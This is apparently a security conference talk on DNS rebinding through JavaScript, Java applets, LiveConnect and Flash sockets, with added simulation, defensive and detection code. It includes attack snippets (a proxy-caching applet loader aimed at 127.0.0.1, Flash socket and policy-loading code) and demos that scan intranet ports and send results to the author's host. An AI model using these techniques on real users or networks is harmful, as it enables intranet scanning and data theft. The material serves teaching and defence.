DNS Rebinding and Socket API Kanatoko <anvil@jumperz.net> http://www.jumperz.net/
DNS Rebinding Overview(1) • An attack vector, not a bug in any particular piece of software • Any operating system may be affected: Windows, Linux, Mac OS X … • There are no patches • Arises from the interaction between web browsers, web servers, DNS servers and proxy servers • A real threat: your system may be vulnerable
DNS Rebinding Overview(2) • Eve takes control of Alice's web browser and makes it do something on her behalf • Stealing information • Making Alice attack other hosts • Not a direct attack against the servers • Not an attack against the DNS servers
How is the attack deployed? • It starts when Alice visits Eve's trap page, just as with XSS and CSRF • Alice is unaware of it • Social engineering via e-mail, BBS posts and blog comments • It is difficult to tell whether a page is a trap or not • Sometimes hacked web sites (of well-known companies, for example) are used to deliver the attack
Technologies used in DNS Rebinding • JavaScript • Java • Flash • Malicious code starts running in Alice's browser • But there are security constraints, for example: it cannot read from or write to local files • Each of these technologies has a network access function
When Alice visits Eve's page…(1) • Eve's malicious code starts running and accesses the network • JavaScript: fetches resources using XMLHttpRequest, SCRIPT tags and IMG tags (HTTP) • Flash: URLLoader (HTTP), Socket (TCP) • Java: URLConnection (HTTP), Socket (TCP), DatagramSocket (UDP)
When Alice visits Eve's page…(2) • Of course there are security constraints on the network access functions • Access is allowed only to the origin host from which the Java applet (.class, .zip, .jar), the Flash SWF file or the web page was loaded • Known as the "Same Origin Policy"
DNS Rebinding attack vector(1) • Eve owns the domain "eve.tld", so Eve controls the authoritative DNS server for "eve.tld" • Eve runs a web server at "218.45.25.5" and puts the malicious code there • Eve binds "218.45.25.5" to the hostname "www.eve.tld" and sets a very short TTL on the record (for example, 8 seconds) • Alice visits Eve's trap page at "www.eve.tld" • Alice does the first name resolution; Eve's DNS server answers "218.45.25.5" • Alice's browser loads Eve's trap page • Soon the TTL expires • At the same time, Eve reconfigures the DNS server and binds "127.0.0.1" to the hostname "www.eve.tld"
DNS Rebinding attack vector(2) • Eve's malicious code, now running in Alice's browser, tries to access "www.eve.tld" again • Alice does a second name resolution; this time Eve's DNS server answers "127.0.0.1" • The code connects to "127.0.0.1" • Although "127.0.0.1" is not one of Eve's hosts, the code is allowed to connect because the hostname is still "www.eve.tld" (same origin: the check is on the name, not the address) • As the example shows, DNS rebinding lets Eve reach addresses like "127.0.0.1" that her code should never be allowed to access
What is DNS Pinning? • Only Flash is vulnerable to the attack sequence on the previous pages as it stands • The other two technologies (JavaScript in the browser, and Java) cache the resolved address in their own way, so the TTL never expires for them; this behavior violates the DNS protocol • It is called "DNS Pinning" • Sun Microsystems implemented DNS pinning in Java as a countermeasure to DNS rebinding (or DNS spoofing) • The browser vendors (Microsoft, Mozilla.org and Opera), on the other hand, do not seem very conscious of DNS rebinding • To carry out DNS rebinding, Eve must make Alice discard the pinned DNS information
What is Anti-DNS Pinning(1) • Making Alice discard the pinned DNS information • Applies only to JavaScript • Flash does not pin DNS at all • Java never discards the pinned DNS information, so Java is immune to anti-DNS pinning • Martin Johns notified the security community of this issue in August 2006 • http://shampoo.antville.org/stories/1451301/
What is Anti-DNS Pinning(2) • If an access to the server fails after an appropriate period has elapsed, the browser discards the pinned DNS information and does a second name resolution • Ways to make the access fail: change a firewall rule; shut down the web server; make Alice access a closed port (for example http://example.com:81/) • Anti-DNS pinning lets Eve force Alice into a second name resolution, so Eve can then carry out DNS rebinding • Anti-DNS pinning is one step of DNS rebinding (against JavaScript)
DNS Rebinding against JavaScript • XMLHttpRequest is mainly used • Eve fetches information from web servers she could not reach without DNS rebinding, and sends it to her own host • The targets can only be web servers, because the communication is HTTP • It is not "cross domain" but "cross address": the HTTP requests carry the cookies of www.eve.tld, not the cookies or Authorization header of the target web site • For this reason it is not useful for CSRF • For the same reason it is almost pointless to make Alice fetch information from the Internet, so the Intranet is the main target • There are exceptions: where address-based authentication exists (for example, the countermeasure to the Universal PDF XSS issue), Eve may use DNS rebinding to fetch information through Alice's browser • The stolen information is sent to another of Eve's hosts; this is easy for Eve because the "Same Origin Policy" does not restrict sending data with JavaScript
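The sequence on the "attack vector" pages and the three client behaviours named on the pinning pages, as an added example that is not part of the original slides. It is a small model: Eve's DNS server, a client whose resolver cache either honours the TTL (the slides' description of Flash), pins until a connection fails (JavaScript) or pins for the life of the process (Java), and the closed-port trick used to break the browser's pin. Hostnames, addresses and the 8-second TTL are the slides' own; the clock and which ports are open are constructed for the model.

```javascript
// Added example: not from the original slides. Models the rebinding sequence of
// "DNS Rebinding attack vector(1)/(2)" and the three client behaviours named on
// the pinning slides. Names, addresses and the 8-second TTL are the slides' own;
// the timings and which ports are open are constructed for the model.

const ATTACKER_HOST = 'www.eve.tld';
const ATTACKER_IP = '218.45.25.5';
const TARGET_IP = '127.0.0.1';
const TTL = 8; // seconds

// Eve's authoritative DNS server: answers with the real web server until Alice
// has loaded the trap page, then rebinds the name to loopback.
class EveDns {
  constructor() { this.rebound = false; }
  rebind() { this.rebound = true; }
  resolve(name) {
    if (name !== ATTACKER_HOST) return null;
    return { ip: this.rebound ? TARGET_IP : ATTACKER_IP, ttl: TTL };
  }
}

// Which (address, port) pairs accept a TCP connection in the model: Eve's web
// server and Alice's loopback web server listen on 80; port 81 is closed.
function portOpen(ip, port) {
  return (ip === ATTACKER_IP || ip === TARGET_IP) && port === 80;
}

// A client with one of three pinning behaviours:
//   'none'    honours the TTL (the slides' description of Flash)
//   'browser' pins, but drops the pin after a failed connection (JavaScript)
//   'forever' pins for the life of the process (Java)
class Client {
  constructor(dns, pinning) {
    this.dns = dns;
    this.pinning = pinning;
    this.cache = null; // { ip, expires }
    this.now = 0;      // model clock, seconds
  }
  sleep(seconds) { this.now += seconds; }
  lookup(name) {
    const c = this.cache;
    const usable = c !== null && (this.pinning !== 'none' || c.expires > this.now);
    if (usable) return c.ip;
    const ans = this.dns.resolve(name);
    this.cache = { ip: ans.ip, expires: this.now + ans.ttl };
    return ans.ip;
  }
  // The same-origin check compares host *names*; the address is whatever the
  // cache or resolver gives. Returns the address actually reached, or null.
  connect(name, port) {
    if (name !== ATTACKER_HOST) throw new Error('same-origin policy blocks ' + name);
    const ip = this.lookup(name);
    if (portOpen(ip, port)) return ip;
    if (this.pinning === 'browser') this.cache = null; // anti-DNS pinning
    return null;
  }
}

// Runs the whole sequence against a client with the given pinning mode and
// returns the address the malicious code's request finally reaches.
function runAttack(pinning) {
  const dns = new EveDns();
  const alice = new Client(dns, pinning);
  alice.connect(ATTACKER_HOST, 80);   // page load from 218.45.25.5
  alice.sleep(TTL + 1);               // TTL expires
  dns.rebind();                       // Eve switches the record to 127.0.0.1
  if (pinning === 'browser') {
    alice.connect(ATTACKER_HOST, 81); // "closed port method": fails, pin dropped
  }
  return alice.connect(ATTACKER_HOST, 80);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const mode of ['none', 'browser', 'forever']) {
    console.log(mode + ': request reached ' + runAttack(mode));
  }
}
```

Run it and the 'none' and 'browser' clients end up talking to 127.0.0.1 while the 'forever' client stays on 218.45.25.5, which is the whole content of the pinning slides in one place: pinning only protects if nothing ever makes the client throw the pin away.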
Demo: DNS Rebinding on JavaScript • http://www.jumperz.net/index.php?i=2&a=1&b=7 • Fetches information from the Intranet and sends it to "www.jumperz.net" • I was skeptical about whether DNS rebinding was a real threat when I first read Martin's article • It took me 20 hours to make this demo work stably • A web application (JSP), a DNS server (djbdns) and JavaScript in the browser are used • Uses the "closed port method" for anti-DNS pinning • Special thanks to Kawa from Team Tidori
JavaScript on each browser • On Firefox, the code needs to wait about 2 minutes before anti-DNS pinning takes effect • On IE6 and Opera, the code only needs to wait for the TTL (a few seconds) • IE7: not checked yet
Countermeasures for DNS Rebinding on JavaScript • Require authentication for HTTP access; Basic authentication is enough • Disabling JavaScript is a perfect countermeasure • It is not a threat, because easy and effective countermeasures exist • Of course the default usernames/passwords (of ADSL routers, for example) must be changed
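The "Basic authentication is enough" countermeasure in code, as an added example that is not from the original slides, written as a pure admission function over a constructed request object so it runs offline. It also adds one check the slide does not list: refusing any request whose Host header is not a name this server is meant to answer for. A rebound XMLHttpRequest arrives with "Host: www.eve.tld", so that check alone stops it before authentication is even consulted. The served hostnames and the credentials are constructed.

```javascript
// Added example: not from the original slides. Admission logic for an intranet
// web server (a router's admin page, say) written as a pure function over a
// constructed request object so it runs offline. It implements the slide's
// "Basic authentication is enough" and adds one check the slide does not list:
// refusing requests whose Host header is not a name this server answers for.
// A rebound XMLHttpRequest arrives with "Host: www.eve.tld", so that check alone
// stops it. SERVED_HOSTS and the credentials below are constructed.

const SERVED_HOSTS = new Set(['intranet.example', 'localhost', '192.168.0.1']);
const VALID_USERS = new Map([['admin', 'not-the-default-password']]); // constructed

// Constant-time comparison so a wrong password cannot be told apart by timing.
function safeEqual(a, b) {
  const ab = Buffer.from(a), bb = Buffer.from(b);
  let diff = ab.length ^ bb.length;
  for (let i = 0; i < Math.max(ab.length, bb.length); i++) {
    diff |= (ab[i] || 0) ^ (bb[i] || 0);
  }
  return diff === 0;
}

function parseBasicAuth(header) {
  if (typeof header !== 'string' || !header.startsWith('Basic ')) return null;
  const decoded = Buffer.from(header.slice(6), 'base64').toString('utf8');
  const i = decoded.indexOf(':');
  if (i < 0) return null;
  return { user: decoded.slice(0, i), pass: decoded.slice(i + 1) };
}

// Returns the status the server should answer with: 421 (Misdirected Request)
// for a Host header we do not serve, 401 for missing or wrong credentials,
// 200 otherwise.
function admit(req) {
  const host = String(req.headers.host || '').replace(/:\d+$/, '').toLowerCase();
  if (!SERVED_HOSTS.has(host)) return 421;
  const cred = parseBasicAuth(req.headers.authorization);
  if (!cred) return 401;
  const expected = VALID_USERS.get(cred.user);
  if (expected === undefined || !safeEqual(expected, cred.pass)) return 401;
  return 200;
}

function basicHeader(user, pass) {
  return 'Basic ' + Buffer.from(user + ':' + pass).toString('base64');
}

// Constructed requests: a rebound one (the browser sends Eve's host name and no
// credentials for the target), a same-host one without credentials, and a
// proper one.
const REBOUND = { headers: { host: 'www.eve.tld' } };
const NO_AUTH = { headers: { host: 'intranet.example' } };
const GOOD = { headers: { host: 'intranet.example:80',
                          authorization: basicHeader('admin', 'not-the-default-password') } };

if (typeof require !== 'undefined' && require.main === module) {
  console.log('rebound:', admit(REBOUND), 'no auth:', admit(NO_AUTH), 'good:', admit(GOOD));
}
```

The Host check is worth keeping even where authentication is in place: it also protects pages that are deliberately unauthenticated, and it costs one string comparison per request.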
DNS Rebinding on FLASH and Java(1) • Socket APIs are available • Eve's code can implement any TCP-based protocol • Far more dangerous than DNS rebinding on JavaScript: to any host on the Internet or the Intranet, with any TCP-based protocol, from Alice's browser • Port scanning • Spam e-mail • Exploiting known vulnerabilities • File-sharing networks • DoS attacks • Exploiting address-based authentication
DNS Rebinding on FLASH and Java(2) • Eve can use Alice's browser as a TCP (or UDP) proxy, because her malicious code can send and receive data at any time through another host such as "www2.eve.tld", even while the original name is rebound • Alice's system (or network) can be both a victim and an assailant
DNS Rebinding on Java(1) • Sun's Java Virtual Machine • Applet code runs under a security restriction called the "Sandbox" • The host an applet is allowed to communicate with is the origin of the applet, not the origin of the web page • The Socket class (TCP) and the DatagramSocket class (UDP) are available • Binary data can be sent and received • The resolved address is cached until the process terminates (forever): a very strong form of DNS pinning • This clearly violates the DNS protocol, and causes trouble when you implement server applications such as an SMTP server in Java • The security property "networkaddress.cache.ttl" (set in the JRE's java.security file) controls this behavior, but even then the TTL of the DNS record itself is ignored • "networkaddress.cache.ttl" cannot be set from an applet
DNS Rebinding on Java(2) • There was a related issue in 1996 • http://www.cs.princeton.edu/sip/news/sun-02-22-96.html • There is no configuration like "disable sockets in Java applets" • The Socket class cannot simply be removed from Java because it is also used to download the applet itself • Java downloads the applet by itself and does not rely on the browser • So the browser's cache is not used when Java downloads the applet • Java does its own name resolution for the download • The point is that Java does name resolution BEFORE the applet is downloaded, and the result of that resolution is cached forever
DNS Rebinding on Java(3) • If Eve's DNS server returns the fake IP address for Alice's name resolution, the applet is never downloaded and the attack fails • If Eve's DNS server returns the correct IP address, the applet is downloaded properly, but Eve cannot rebind the address because Alice's Java caches the first resolution forever; the attack fails as well • In both cases the attack fails • Only users behind proxy servers are vulnerable • Business users on a corporate network with an application proxy gateway are more exposed than home users behind NAT
DNS Rebinding on Java(4) • Make the proxy server cache the Java applet before Java is activated:
    // make the proxy cache the applet: the browser fetches it through the proxy
    var foo = new Image();
    foo.src = "http://12345.jumperz.net/exploits/MTCPCApplet.class";
    // wait for the TTL to expire, then add the applet tag to the page
    setTimeout(f1, 1000 * 12);
    function f1() {
        var base = document.getElementById("base");
        var str = '<applet code="MTCPCApplet.class" codebase="http://12345.jumperz.net/exploits/">' +
                  '<param name="address" value="127.0.0.1">' +
                  '</applet>';
        base.innerHTML = str;
    }
DNS Rebinding on Java(5) • The applet is downloaded by the proxy server, so although Java does its own name resolution and is handed the spoofed address, the proxy serves the cached applet to Alice's Java and Eve's malicious code starts running successfully
- The request of the browser:
    GET /exploits/MTCPCApplet.class HTTP/1.0
    Accept: */*
    Referer: http://1190066223254.jumperz.net/exploits/ap3.jsp?address=127.0.0.1
    Accept-Language: ja
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)
    Host: 1190066223254.jumperz.net
    Cookie: JSESSIONID=C6D04DDABD28F3B0FACE61F9EA70B44A
    Connection: Keep-Alive
- The request of the Java applet:
    GET /exploits/MTCPCApplet.class HTTP/1.1
    User-Agent: Mozilla/4.0 (Windows 2000 5.0) Java/1.6.0_02
    Host: 1190066223254.jumperz.net
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Cookie: JSESSIONID=C6D04DDABD28F3B0FACE61F9EA70B44A
    Connection: keep-alive
Demo: DNS Rebinding on Java • http://www.jumperz.net/index.php?i=2&a=1&b=10 • Scans some ports, retrieves the banner from the server, and sends the result to "www.jumperz.net" • Works on IE, Firefox and Opera • Works only for users behind a proxy
Countermeasures for DNS Rebinding on Java(1) • Disable Java • Restrict the ports that may be connected to, using a personal firewall (for example: only 80 and 443) • Require authentication for every protocol used on the Intranet • Patch known vulnerabilities • Use the firewall to find and stop outgoing attacks (for example a UDP/53 DoS) • It is not easy to find malicious Java code at the gateway or with an IDS/IPS, because the applet class file can be packed into .zip and .jar files
Countermeasures for DNS Rebinding on Java(2) • Set up a JRE used only for Java applets and patch the SecurityManager class. The patch below replaces the requested host with "127.0.0.2", an address no applet is granted a SocketPermission for, so every socket connect from an applet is refused:
    public void checkConnect(String host, int port) {
        if (host == null) {
            throw new NullPointerException("host can't be null");
        }
        host = "127.0.0.2"; // patched: check every connection as if it were to 127.0.0.2
        if (!host.startsWith("[") && host.indexOf(':') != -1) {
            host = "[" + host + "]";
        }
        if (port == -1) {
            checkPermission(new SocketPermission(host,
                SecurityConstants.SOCKET_RESOLVE_ACTION));
        } else {
            checkPermission(new SocketPermission(host + ":" + port,
                SecurityConstants.SOCKET_CONNECT_ACTION));
        }
    }
DNS Rebinding on LiveConnect • Works only if both Java and JavaScript are enabled • Java code can be written inside JavaScript code • var s = new java.net.Socket( "www.jumperz.net", 25 ) • This is part of the "LiveConnect" technology • Not supported on IE • Eve can deliver the malicious Java code to Alice before Java is activated, so Java's own name resolution never sees the real address first • Users NOT behind a proxy are vulnerable too • Opera's implementation of LiveConnect seems to have some bugs • Firefox is the most dangerous browser
Demo: DNS Rebinding on LiveConnect • http://www.jumperz.net/index.php?i=2&a=1&b=9 • A collaboration between Martin Johns and me • http://shampoo.antville.org/stories/1566124/ • Scans some ports, retrieves the banner from the server, and sends the result to www.jumperz.net • Works on Firefox and Opera
Countermeasures for DNS Rebinding on LiveConnect • The same as those for Java
DNS Rebinding on FLASH(1) • The Socket class is available from ActionScript 3.0 • Can communicate with a server using any TCP-layer protocol • Binary data can be sent and received • Works on Flash Player 9.0 or later • The host that Flash is allowed to communicate with is the origin of the .swf file, not the origin of the web page • Flash does not implement DNS pinning at all: the DNS information is discarded once the TTL has elapsed • DNS rebinding on Flash is therefore very easy • The addition of the Socket class to Flash is a threat because Flash is one of the most widely used plugins, and many users keep it enabled • There is no configuration like "disable sockets in Flash"
DNS Rebinding on FLASH(2) • An example of the Socket class (the original assigned a local variable in test1() instead of the field, so onConnected() would have dereferenced null; fixed here, and flush() added, without which Socket sends nothing):
    import flash.net.Socket;
    import flash.events.Event;

    private var sock1:Socket;

    private function test1():void {
        sock1 = new Socket();
        sock1.addEventListener( Event.CONNECT, onConnected );
        sock1.connect( "www.jumperz.net", 80 );
    }

    private function onConnected( e:Event ):void {
        sock1.writeMultiByte( "GET / HTTP/1.0\r\n\r\n", "ISO-8859-1" );
        sock1.flush(); // data is buffered until flushed
    }
DNS Rebinding on FLASH(3) • By default, can connect only to ports above 1024; this is one difference between Flash and Java (later Flash Player releases, from 9.0.124.0, require a socket policy file for every port) • Policy-loading is required to connect to ports below 1024, and is done with a small TCP-based protocol of Flash's own • Policy-loading succeeds from behind NAT • Eve could use port 443 for policy-loading • Detecting the policy-loading traffic with an IDS or IPS would therefore have some value • An example signature (Snort; the sid is a local one, which Snort requires in every rule):
    alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FLASH Socket policy-file-request"; flow:to_server,established; content:"<policy-file-request/>"; nocase; sid:1000001; rev:1;)
DNS Rebinding on FLASH(4) • An example of policy-loading, and the resulting traffic:
    // load the socket policy from port 2
    flash.system.Security.loadPolicyFile( "xmlsocket://www.jumperz.net:2" );
- From client to server:
    <policy-file-request/>
- From server to client:
    <?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
      <allow-access-from domain="*.jumperz.net" to-ports="*" />
    </cross-domain-policy>
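The policy exchange on this and the previous slide, seen from the server and sensor side, as an added example that is not from the original slides: a check for the "<policy-file-request/>" bytes the Snort signature keys on, and an evaluator that answers whether a SWF served from a given host may open a socket to a given port under the policy the server returned. Wildcard and to-ports matching follow Adobe's published cross-domain-policy format (a "*.example" pattern is treated as covering the bare domain as well, as that format specifies). The SWF hosts and ports tried are constructed; the policy text is the slide's own.

```javascript
// Added example: not from the original slides. Server/sensor-side model of the
// Flash socket policy exchange: detects the policy request bytes the Snort rule
// matches on, and evaluates a returned policy the way the player would before
// permitting a socket. Domain and to-ports matching follow Adobe's published
// cross-domain-policy format. SWF hosts and ports below are constructed; the
// policy text is the one on the slide.

// Flash terminates the request with a NUL byte; neither the Snort content match
// nor this check depends on it.
function isPolicyRequest(payload) {
  return Buffer.from(payload).indexOf(Buffer.from('<policy-file-request/>')) !== -1;
}

// Pulls the <allow-access-from .../> entries out of a policy document.
function parsePolicy(xml) {
  const rules = [];
  const tag = /<allow-access-from\b([^>]*?)\/?>/g;
  const attr = /([\w-]+)="([^"]*)"/g;
  let m;
  while ((m = tag.exec(xml)) !== null) {
    const attrs = {};
    let a;
    attr.lastIndex = 0;
    while ((a = attr.exec(m[1])) !== null) attrs[a[1]] = a[2];
    rules.push({ domain: attrs.domain || '', toPorts: attrs['to-ports'] || '' });
  }
  return rules;
}

// "*" matches anything; "*.base" matches base and any of its subdomains.
function domainMatches(pattern, host) {
  pattern = pattern.toLowerCase();
  host = host.toLowerCase();
  if (pattern === '*') return true;
  if (pattern.startsWith('*.')) {
    const base = pattern.slice(2);
    return host === base || host.endsWith('.' + base);
  }
  return pattern === host;
}

// to-ports accepts "*", single ports and ranges, comma separated: "80,443,1024-65535".
function portMatches(spec, port) {
  return spec.split(',').some(part => {
    part = part.trim();
    if (part === '*') return true;
    const range = part.split('-').map(Number);
    if (range.length === 2) return port >= range[0] && port <= range[1];
    return range.length === 1 && range[0] === port;
  });
}

// True if the policy grants a SWF loaded from swfHost a socket to port on the
// server that served the policy.
function socketAllowed(policyXml, swfHost, port) {
  return parsePolicy(policyXml).some(r =>
    domainMatches(r.domain, swfHost) && portMatches(r.toPorts, port));
}

// The policy served in the slide's example.
const SLIDE_POLICY = '<?xml version="1.0"?>\n' +
  '<cross-domain-policy>\n' +
  '  <allow-access-from domain="*.jumperz.net" to-ports="*" />\n' +
  '</cross-domain-policy>';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('request detected:', isPolicyRequest('<policy-file-request/>\0'));
  console.log('www.jumperz.net -> :25 allowed:', socketAllowed(SLIDE_POLICY, 'www.jumperz.net', 25));
  console.log('www.eve.tld -> :25 allowed:', socketAllowed(SLIDE_POLICY, 'www.eve.tld', 25));
}
```

Note what the slide's policy actually grants: any SWF under jumperz.net may open a socket to any port on that server, which is exactly what the rebinding attacker wants once the name points somewhere else. A server that must publish a socket policy should list only the ports it really serves to Flash clients.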
Demo: DNS Rebinding on FLASH • http://www.jumperz.net/index.php?i=2&a=1&b=8 • This demo brought the Flash Socket class to the attention of the security community • Works on Flash Player 9.0 or later • Cannot scan ports below 1024 on a non-NAT network because of the Flash policy-loading mechanism • Scans some ports, retrieves the banner from the server, and sends the result to "www.jumperz.net"
Countermeasures for DNS Rebinding on FLASH(1) • Disable Flash • Otherwise the same as those for Java
Countermeasures for DNS Rebinding on FLASH(2) • Patch the Flash Player .dll or .ocx file • Overwrite the "call" instruction that invokes the Winsock "connect" API • Almost no side effects (you can still watch YouTube) • [Figures: disassembly of the call site before and after the patch]
Dynamic DNS and DNS Pinning • At some point an IP address is in use by Bob's web server • Alice visits Bob's web site • Bob's connection drops; he reconnects to the Internet and his server's IP address changes • Bob soon rebinds his hostname to the new IP address using a Dynamic DNS service • Eve is assigned Bob's old IP address (by the ISP, via DHCP) • If Alice has pinned the DNS information for Bob's hostname, her HTTP requests go to Eve's web server instead of Bob's • Eve can then read Alice's session id from the cookie and hijack her session • This can happen with any web site, because every service based on DNS is "dynamic" in the long term • So DNS pinning may itself cause another security problem
Countermeasures for all 3 technologies • Monitor DNS packets (is there any good system for this purpose?) • Look for a change of IP address within a short period, especially from a global IP address to a private one • DNS rebinding attacks are hard to spot from TTL values alone, because very short TTLs are widely used • Firefox add-ons are useful (NoScript, FlashBlock, etc.)
Other things • DNS rebinding is a really complicated problem involving web browsers, plugins, DNS and proxies • A real threat • We will not find attacks if we are not prepared to look for them • Do we need a detection system for DNS rebinding, as a first step? • We need more flexible configuration in the browsers: "disable/enable sockets in Java/Flash", and an "IP address has changed" notification dialog
Thank you! • Any questions?
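The detection heuristic named on this slide, as an added example that is not from the original slides: it runs over a constructed log of DNS answers in the shape a resolver log or passive-DNS sensor might produce, and flags a name whose A record switches from a public address to loopback or a private (RFC 1918 / link-local) address within a short window. It deliberately ignores TTL values, for the reason the slide gives. The log entries are constructed; www.eve.tld and 218.45.25.5 are the slides' own example values.

```javascript
// Added example: not from the original slides. The heuristic described on the
// slide, run over a constructed DNS answer log: alert when a name's A record
// goes from a public address to a loopback or private address within a short
// window. TTLs are ignored. Log entries are constructed; www.eve.tld and
// 218.45.25.5 are the slides' own example values.

function ipToInt(ip) {
  const p = ip.split('.').map(Number);
  if (p.length !== 4 || p.some(n => !Number.isInteger(n) || n < 0 || n > 255)) {
    throw new Error('not an IPv4 address: ' + ip);
  }
  return ((p[0] << 24) >>> 0) + (p[1] << 16) + (p[2] << 8) + p[3];
}

// Address ranges a name on the public Internet should never rebind into.
const NON_PUBLIC = [
  ['127.0.0.0', 8], ['10.0.0.0', 8], ['172.16.0.0', 12], ['192.168.0.0', 16],
  ['169.254.0.0', 16], ['0.0.0.0', 8],
];

function isNonPublic(ip) {
  const n = ipToInt(ip);
  return NON_PUBLIC.some(([net, bits]) => {
    const mask = (0xffffffff << (32 - bits)) >>> 0;
    return ((n & mask) >>> 0) === ((ipToInt(net) & mask) >>> 0);
  });
}

// answers: [{ t: seconds, name, ip }] in time order, as recorded at the sensor.
// Returns one alert per public -> non-public change seen within windowSeconds.
function detectRebinding(answers, windowSeconds = 300) {
  const last = new Map(); // name -> { t, ip }
  const alerts = [];
  for (const a of answers) {
    const prev = last.get(a.name);
    if (prev && prev.ip !== a.ip && !isNonPublic(prev.ip) && isNonPublic(a.ip)
        && a.t - prev.t <= windowSeconds) {
      alerts.push({ name: a.name, from: prev.ip, to: a.ip, afterSeconds: a.t - prev.t });
    }
    last.set(a.name, { t: a.t, ip: a.ip });
  }
  return alerts;
}

// Constructed log: Eve's rebind, an ordinary CDN address change (public to
// public, ignored) and an intranet name that is private from its first answer
// (no public->private transition, ignored).
const SAMPLE_LOG = [
  { t: 0,    name: 'www.eve.tld',     ip: '218.45.25.5' },
  { t: 1,    name: 'cdn.example.net', ip: '203.0.113.10' },
  { t: 2,    name: 'corp.example',    ip: '10.1.2.3' },
  { t: 12,   name: 'www.eve.tld',     ip: '127.0.0.1' },
  { t: 30,   name: 'cdn.example.net', ip: '203.0.113.11' },
  { t: 3600, name: 'corp.example',    ip: '10.1.2.4' },
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(detectRebinding(SAMPLE_LOG));
}
```

Keying on the public-to-private transition rather than on change alone keeps CDN and round-robin churn out of the alert stream; the window is there so that a legitimate site moving behind a VPN months later does not fire it.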